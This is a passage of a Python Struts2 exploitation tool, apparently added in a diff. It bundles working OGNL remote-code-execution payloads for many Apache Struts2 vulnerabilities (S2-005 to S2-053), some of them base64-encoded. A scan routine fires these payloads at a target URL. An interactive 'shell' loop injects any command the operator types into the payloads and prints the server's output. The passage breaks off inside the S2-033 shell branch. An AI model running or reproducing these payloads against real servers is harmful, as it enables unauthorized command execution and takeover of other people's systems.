OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type":"application/xml" +} +class struts_baseverify: + def __init__(self, url): + self.url = url + self.poc = { + "ST2-005":base64.b64decode("KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCduZXRzdGF0IC1hblwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKSkmKGspKCgnXDQzbXlkYXQucmVhZEZ1bGx5KFw0M215cmVzKScpKGQpKSYobCkoKCdcNDNteXN0clw3NW5ld1w0MGphdmEubGFuZy5TdHJpbmcoXDQzbXlyZXMpJykoZCkpJihtKSgoJ1w0M215b3V0XDc1QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpJykoZCkpJihuKSgoJ1w0M215b3V0LmdldFdyaXRlcigpLnByaW50bG4oXDQzbXlzdHIpJykoZCkp"), + "ST2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''', + "ST2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCduZXRzdGF0IC1hbicpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="), + "ST2-016":base64.b64decode("cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3bmV0c3RhdCUyMC1hbiUyNy50b1N0cmluZygpLnNwbGl0KCUyN1xccyUyNykpKS5zdGFydCgpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlciglMjdcXEElMjcpLCUyM3N0ciUzZCUyM3MuaGFzTmV4dCgpPyUyM3MubmV4dCgpOiUyNyUyNywlMjNyZXNwJTNkJTIzY29udGV4dC5nZXQoJTI3Y28lMjclMmIlMjdtLm9wZW4lMjclMmIlMjdzeW1waG9ueS54d28lMjclMmIlMjdyazIuZGlzcCUyNyUyYiUyN2F0Y2hlci5IdHRwU2VyJTI3JTJiJTI3dmxldFJlcyUyNyUyYiUyN3BvbnNlJTI3KSwlMjNyZXNwLnNldENoYXJhY3RlckVuY29kaW5nKCUyN1VURi04JTI3KSwlMjNyZXNwLmdldFdyaXRlcigpLnByaW50bG4oJTIzc3RyKSwlMjNyZXNwLmdldFdyaXRlcigpLmZsdXNoKCksJTIzcmVzcC5nZXRXcml0ZXIoKS5jbG9zZSgpfQ=="), + "ST2-019":base64.b64decode("ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeyduZXRzdGF0JywnLWFuJ30pKS5zdGFydCgpLCNiPSNhLmdldElucHV0U3RyZWFtKCksI2M9bmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIoI2IpLCNkPW5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCNjKSwjZT1uZXcgY2hhclsxMDAwMF0sI2QucmVhZCgjZSksI3Jlc3AucHJpbnRsbigjZSksI3Jlc3AuY2xvc2UoKQ=="), + "ST2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an''', + "ST2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8''', + "ST2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=netstat -an''', + "ST2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=netstat -an''', + "ST2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''', + "ST2-052":''' 0 false 0 whoami false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ''', + "ST2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''', + } + self.shell = { + "struts2-005":base64.b64decode("KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCdGVVpaSU5HQ09NTUFORFwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKSkmKGspKCgnXDQzbXlkYXQucmVhZEZ1bGx5KFw0M215cmVzKScpKGQpKSYobCkoKCdcNDNteXN0clw3NW5ld1w0MGphdmEubGFuZy5TdHJpbmcoXDQzbXlyZXMpJykoZCkpJihtKSgoJ1w0M215b3V0XDc1QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpJykoZCkpJihuKSgoJ1w0M215b3V0LmdldFdyaXRlcigpLnByaW50bG4oXDQzbXlzdHIpJykoZCkp"), + "struts2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''', + "struts2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCdGVVpaSU5HQ09NTUFORCcpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="), + "struts2-016":base64.b64decode("cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3RlVaWklOR0NPTU1BTkQlMjcudG9TdHJpbmcoKS5zcGxpdCglMjdcXHMlMjcpKSkuc3RhcnQoKS5nZXRJbnB1dFN0cmVhbSgpKS51c2VEZWxpbWl0ZXIoJTI3XFxBJTI3KSwlMjNzdHIlM2QlMjNzLmhhc05leHQoKT8lMjNzLm5leHQoKTolMjclMjcsJTIzcmVzcCUzZCUyM2NvbnRleHQuZ2V0KCUyN2NvJTI3JTJiJTI3bS5vcGVuJTI3JTJiJTI3c3ltcGhvbnkueHdvJTI3JTJiJTI3cmsyLmRpc3AlMjclMmIlMjdhdGNoZXIuSHR0cFNlciUyNyUyYiUyN3ZsZXRSZXMlMjclMmIlMjdwb25zZSUyNyksJTIzcmVzcC5zZXRDaGFyYWN0ZXJFbmNvZGluZyglMjdVVEYtOCUyNyksJTIzcmVzcC5nZXRXcml0ZXIoKS5wcmludGxuKCUyM3N0ciksJTIzcmVzcC5nZXRXcml0ZXIoKS5mbHVzaCgpLCUyM3Jlc3AuZ2V0V3JpdGVyKCkuY2xvc2UoKX0="), + "struts2-019":base64.b64decode("ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeydGVVpaSU5HQ09NTUFORCd9KSkuc3RhcnQoKSwjYj0jYS5nZXRJbnB1dFN0cmVhbSgpLCNjPW5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKCNiKSwjZD1uZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcigjYyksI2U9bmV3IGNoYXJbMTAwMDBdLCNkLnJlYWQoI2UpLCNyZXNwLnByaW50bG4oI2UpLCNyZXNwLmNsb3NlKCk="), + "struts2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=FUZZINGCOMMAND''', + "struts2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=FUZZINGCOMMAND&pp=____A&ppp=%20&encoding=UTF-8''', + "struts2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=FUZZINGCOMMAND''', + "struts2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=FUZZINGCOMMAND''', + "struts2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='FUZZINGCOMMAND').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''', + "struts2-052":''' 0 false 0 FUZZINGCOMMAND false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ''', + "struts2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo%20%2281dc9bdb52d04dc2%22%26%26FUZZINGCOMMAND%26%26echo%20%220036dbd8313ed055%22%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''', + } + def check(self, pocname, vulnstr): + if vulnstr.find("Active Internet connections") is not -1: + cprint("目标存在" + pocname + "漏洞..[Linux]", "red") + elif vulnstr.find("Active Connections") is not -1: + cprint("目标存在" + pocname + "漏洞..[Windows]", "red") + elif vulnstr.find("活动连接") is not -1: + cprint("目标存在" + pocname + "漏洞..[Windows]", "red") + elif vulnstr.find("LISTEN") is not -1: + cprint("目标存在" + pocname + "漏洞..[未知OS]", "red") + else: + cprint("目标不存在" + pocname +"漏洞..", "green") + + def scan(self): + cprint('''Code by Lucifer.''', 'cyan') + cprint("-------检测struts2漏洞--------\n目标url:"+self.url, "cyan") + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-005'], timeout=6, verify=False) + self.check("struts2-005", req.text) + except Exception as e: + cprint("检测struts2-005超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-009'], timeout=6, verify=False) + self.check("struts2-009", req.text) + except Exception as e: + cprint("检测struts2-009超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-013'], timeout=6, verify=False) + self.check("struts2-013", req.text) + except Exception as e: + cprint("检测struts2-013超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-016'], timeout=6, verify=False) + self.check("struts2-016", req.text) + except Exception as e: + cprint("检测struts2-016超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-019'], timeout=6, verify=False) + self.check("struts2-019", req.text) + except Exception as e: + cprint("检测struts2-019超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-devmode'], headers=headers, timeout=6, verify=False) + self.check("struts2-devmode", req.text) + except Exception as e: + cprint("检测struts2-devmode超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-032'], headers=headers, timeout=6, verify=False) + self.check("struts2-032", req.text) + except Exception as e: + cprint("检测struts2-032超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-033'], headers=headers, timeout=6, verify=False) + self.check("struts2-033", req.text) + except Exception as e: + cprint("检测struts2-033超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-037'], headers=headers, timeout=6, verify=False) + self.check("struts2-037", req.text) + except Exception as e: + cprint("检测struts2-037超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url, headers=headers2, timeout=6, verify=False) + self.check("struts2-045", req.text) + except Exception as e: + cprint("检测struts2-045超时..", "cyan") + print("超时原因: ", e) + + try: + uploadexp = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x000" + files ={"test":(uploadexp, "text/plain")} + req = requests.post(self.url, files=files, timeout=6, verify=False) + self.check("struts2-046", req.text) + except Exception as e: + cprint("检测struts2-046超时..", "cyan") + print("超时原因: ", e) + + try: + vulnurl = urlparse(self.url)[0] + "://" + urlparse(self.url)[1] + "/struts2-showcase/integration/saveGangster.action" + postdata = { + "name":self.poc['ST2-048'], + "age":"1", + "__checkbox_bustedBefore":"true", + "description":"1", + } + req = requests.post(vulnurl, data=postdata, headers=headers, timeout=6, verify=False) + self.check("struts2-048", req.text) + except Exception as e: + cprint("检测struts2-048超时..", "cyan") + print("超时原因: ", e) + + try: + req1 = requests.get(self.url+"?class[%27classLoader%27][%27jarPath%27]=1", headers=headers, timeout=6, verify=False) + req2 = requests.get(self.url+"?class[%27classLoader%27][%27resources%27]=1", headers=headers, timeout=6, verify=False) + if req1.status_code == 200 and req2.status_code == 404: + cprint("目标存在struts2-020漏洞..(只提供检测)", "red") + else: + cprint("目标不存在struts2-020漏洞..", "green") + except Exception as e: + cprint("检测struts2-020超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, data=self.poc['ST2-052'], headers=headers_052, timeout=6, verify=False) + if req.status_code == 500 and r"java.security.Provider$Service" in req.text: + cprint("目标存在struts2-052漏洞..(参考metasploit中的struts2_rest_xstream模块)", "red") + else: + cprint("目标不存在struts2-052漏洞..", "green") + except Exception as e: + cprint("检测struts2-052超时..", "cyan") + print("超时原因: ", e) + + try: + param="" + vulnurl = self.url + "?" + param + "=" + self.poc['ST2-053'] + req = requests.get(vulnurl, headers=headers, timeout=6, verify=False) + self.check("struts2-053", req.text) + except Exception as e: + cprint("检测struts2-053超时..", "cyan") + print("超时原因: ", e) + + try: + self.url = self.url.replace("/actionChain1.action", "/${12345%2a54321}/actionChain1.action") + req = requests.get(self.url, timeout=6, verify=False, allow_redirects=True) + if r"670592745" in req.url: + cprint("目标存在struts2-057漏洞..(只提供检测)", "red") + else: + cprint("目标不存在struts2-057漏洞..(只提供检测)", "green") + except Exception as e: + cprint("检测struts2-057超时..", "cyan") + print("超时原因: ", e) + + + def inShell(self, pocname): + cprint('''Code by Lucifer.''', 'cyan') + cprint("-------struts2 交互式shell--------\n目标url:"+self.url, "cyan") + prompt = "shell >>" + + if pocname == "struts2-005": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-005'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-009": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-009'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-013": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-013'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-016": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url + req = requests.post(commurl, data=self.shell['struts2-016'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-019": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + command = re.sub(r"\s{2,}", " ", command).replace(" ", "','") + req = requests.post(self.url, data=self.shell['struts2-019'].replace("FUZZINGCOMMAND", command), headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-devmode": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-devmode'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-032": + while True: + print(prompt, end=' ') + command = input() + command = command.strip() + if command != "exit": + try: + commurl = self.url+self.shell['struts2-032'].replace("FUZZINGCOMMAND", command) + req = requests.get(commurl, headers=headers, timeout=6, verify=False) + print(req.text) + except: + cprint("命令执行失败!!!", "red") + else: + sys.exit(1) + + if pocname == "struts2-033": + while True: 